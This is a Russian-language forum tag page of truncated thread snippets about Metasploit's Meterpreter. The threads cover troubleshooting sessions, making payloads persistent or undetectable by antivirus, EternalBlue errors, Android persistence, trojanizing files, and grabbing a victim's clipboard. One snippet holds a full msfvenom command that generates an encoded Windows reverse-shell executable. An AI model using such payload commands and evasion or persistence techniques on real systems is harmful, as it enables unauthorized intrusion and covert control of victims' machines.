meterpreter

  1. K

    метерпретер конект

    Здравствуйте, в инете очень много способов создать фуд пейлоад (метасплоит) запустить его тоже не большая проблема, только вот допустим меня нету дома и метерпретер конектится, но не может подконектиться так как комп выключен, как я знаю сессия умрет через 15 минут да? Что мне сделать чтоб...
  2. recrut

    Debian 9 - install metasploit на vps ( для получения сессии при белом ip)

    Друзья, подскажите, думаю многим пригодится В инете что не сервер, то новая инструкция, + разные оболочки с настойками Посоветуйте, как не напороть косяков! Грамотно установить оболочку, не инсталируя лишнего, что б не вызвать конфликтов. И главное как им (сервером) управлять в графическом...
  3. E

    Проблема Meterpreter session 8 closed. Reason: Died

    Доброго время суток. Нуждаюсь в помощи людей который знакомы с metasploit.Проблема такая, я генерирую пейлоад ( msfvenom -a x64 --platform windows -p windows/x64/shell/reverse_tcp LHOST=172.16.104.130 LPORT=443 -b "\x00" -e x64/shikata_ga_nai -f exe -o /tmp/1.exe ), закидаю файл на машину...
  4. R

    Проблема Eternalblue & Doublepulsar. Error getting output back from Core.

    В локалке имеется машинка Win7 SP1 x86 (192.168.1.106) И Kali linux (192.168.1.103) на которую установлен Metasploit-Framework с добавленным модулем exploit/windows/smb/eternalblue_doublepulsar. Сканирую виндовую машину с помощью auxiliary/scaner/smb/smb_ms17_010: Делаю вывод, что машинка...
  5. R

    Проблема EternalBlue. Did not receive a response from exploit packet.

    Помогите пожалуйста, почему возникает эта ошибка? Можно ли как-то от нее избавиться, и если можно, то как?
  6. kravl

    Как создать payload который будет работать в режиме persistence ?

    Вопрос: Как сделать так что бы сессия была многократная и я мог прослушивать каждый раз один и тот же ПК. На сколько я знаю как-то можно это дело прописать в реестр и автозапуск только как ? Вот так на сколько я понимаю пишется сам пейлоад для получения сессии meterpreter, но он одноразовый...
  7. A

    Шелл в сесиии meterpreter

    Добрый день. Получил сессию meterpreter, и у меня сразу же открылся командный шелл (cmd). После этого не удается перейти на стандартный шелл meterpreter. Как быть? Есть еще вопрос: после того как получил сессию, и случайно закрыл терминал, то всё удалится. Можно ли как то сохранять сессию?
  8. Mitistofel

    Решено Как включить "netlogon" на "windows" машине, имея сессию "meterpreter"?

    Здрасте. Сталкивался кто с подобным? На целевой машине есть сессия "meterpreter" и создан пользователь с правами администратора. Когда пытаюсь подключиться к цели как к дедику, через "RDP". То подключаюсь до того момента, когда вижу строки для входа в машину "windows" с взятыми из "RDP" клиента...
  9. House26

    Решено Миграция процесса meterpreter в другой процесс Android

    Добрый день форумчане)Подскажите как можно мигрировать процесс meterpretor в другой процесс на Android?Или как можно закрепиться в системе?
  10. G

    Meterpreter сессия не открывает директории имеющие пробел в названии.

    Доброго времени суток Господа. Я здесь, на форуме новичок, да и в linux тоже... и до поры до времени не хотел нудить глупыми вопросами, но видимо придется, поскольку ответа не могу найти. Есть сессия meterpreter'a и все происходит отлично кроме одного - не открываются директории имеющие в...
  11. R

    Проблема Помощь с метерпретером

    И так создал пейлод, закинул на виртуалку и вроде все срабатывает но /multi/handler не меняется на meterpreter, да и сам пейлод выдает ошибку, хотя сессия вроде как создалась. В общем реквестирую норм гайдов по этой теме, а то все что я нашел в сети какое то обрывочное да и устарело на пару лет...
  12. Vertigo

    Soft Hwacha и встреча с honeypot

    Добрый вечер , Друзья , Уважаемые Форумчане и Гости форума. Несколько необычное будет сегодня описание инструмента , с которым вас хочу познакомить. Автором его является N00py . Это человек , который увлекается пентестом. Hwacha была в очень далёкие времена известна ,как "Огненная повозка" ...
  13. Rollly

    Статья Закрепление в системе Android

    С первым днём весны! Сегодня покажу как закрепиться в системе андроид. Скрипт будет работать до перезагрузки!. Наверняка у всех такое было, когда умирает сессия при пропадании соединения, и нет возможности запустить её снова, и успеть сделать все дела. Нам необходимо создать полезную нагрузку...
  14. E

    Проблема Не работает shell

    Всем привет! Проблема следующая: на уязвимой машине поднимаю шелл ( windows/shell/bind_tcp). При попытке подключения метасплоит повисает в неопределенном состоянии и не даёт делать никаких действий кроме как выйти из сессии (ctr+c). Повысить сессию до meterpreter тоже завершается неудачей. В...
  15. F

    Реально ли отследить на какой ip отстукует meterpreter сессия

    Реально ли отследить на какой ip отстукует meterpreter сессия? Например с помощью wireshark?
  16. Vander

    Статья Trojanizer - Meterpreter сессия на целевом ПК

    Снова здравствуйте! В этой статье, я хотел бы проверить на практике инструмент, который может объединить два файла (полезную нагрузку и легитимный файл) в SFX – архив, при открытии которого, мы получим активную meterpreter сессию на атакующем хосте. Итак, имя ему Trojanizer: Чтобы сделать...
  17. O

    Получение информации из буфера обмена Victim

    Всем привет! Сегодня столкнулся с такой ситуаций, когда нужно взять информацию из буфера обмена Victim. Разобрался и решил создать лайтовую статью для вас, думаю каждому пригодится в арсенале такая фича! Проводить атаку мы будем в kali linux 2017.3, а атаковать будем многострадальный windows...
  18. L

    Проблема Альтернативы meterpreter

    Вопрос от новичка - после удачного использования эксплоита я получаю meterpreter-сессию. Возможно ли использовать вместо MP payload, например, скачивание и запуск exe файла? Например с CVE-2017-11882? Если да, то как это реализуется?
  19. O

    Статья Phantom-evasion FUD payloads

    И снова Hello! Сегодня я хочу представить Вам удобный инструмент под названием Phantom-evasion. Что он из себя представляет ? Phantom-evasion - это удобный и простой в использовании инструмент для генерации полезной нагрузки, написан на Python, совместим с версиями python 2.7 and 3.4 и выше...
  20. Vertigo

    Статья SpookFlare-инструмент генерации файла для обхода AV

    Здравствуйте,Уважаемые Форумчане,Друзья и Дорогие Читатели портала Codeby. Очередной обзор будет посвящён несколько необычному инструменту. Всем,кто связан так,или иначе, с IT-безопасностью,будет полезно знать о его существовании. Особенность SpookFlare на текущий момент заключается в обходе...